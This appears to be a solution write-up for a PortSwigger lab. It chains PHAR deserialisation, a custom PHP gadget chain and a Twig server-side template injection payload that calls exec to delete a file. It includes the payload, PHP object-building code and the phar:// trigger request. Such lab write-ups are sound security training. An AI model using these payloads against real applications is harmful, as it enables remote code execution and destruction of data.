# Using PHAR deserialisation to deploy a custom gadget chain

## Description

[This lab](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-using-phar-deserialization-to-deploy-a-custom-gadget-chain) does not explicitly use deserialisation. However, if you combine PHAR deserialisation with other advanced hacking techniques, you can still achieve remote code execution via a custom gadget chain. 

## Reproduction and proof of concept

1. Observe that the website has a feature for uploading your own avatar, which only accepts JPG images. Upload a valid JPG as your avatar. Notice that it is loaded using `GET /cgi-bin/avatar.php?avatar=wiener`.
2. In Burp Repeater, request `GET /cgi-bin` to find an index that shows a `Blog.php` and `CustomTemplate.php` file. Obtain the source code by requesting the files using the `.php~` backup extension.
3. Study the source code and identify the gadget chain involving the `Blog->desc` and `CustomTemplate->lockFilePath` attributes.
4. Notice that the `file_exists()` filesystem method is called on the `lockFilePath` attribute.
5. Notice that the website uses the Twig template engine. You can use deserialisation to pass in an server-side template injection (SSTI) payload. Find a documented SSTI payload for remote code execution on [Twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig), and adapt it to delete Carlos's file:

```text
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}
```

6. Write some PHP for creating a `CustomTemplate` and `Blog` containing your SSTI payload:

```text
class CustomTemplate {}
class Blog {}
$object = new CustomTemplate;
$blog = new Blog;
$blog->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}';
$blog->user = 'user';
$object->template_file_path = $blog;
```

7. Create a [phar-jpg polyglot](https://github.com/kunte0/phar-jpg-polyglot) containing the PHP script. 
8. Upload this file as your avatar.
9. In Burp Repeater, modify the request line to deserialise your malicious avatar using a `phar:// stream` as follows:

```text
GET /cgi-bin/avatar.php?avatar=phar://wiener
```
    
10. Send the request to solve the lab.

## Exploitability

An attacker will need to log in to `wiener:peter`; and delete the `morale.txt` file from Carlos's home directory. 
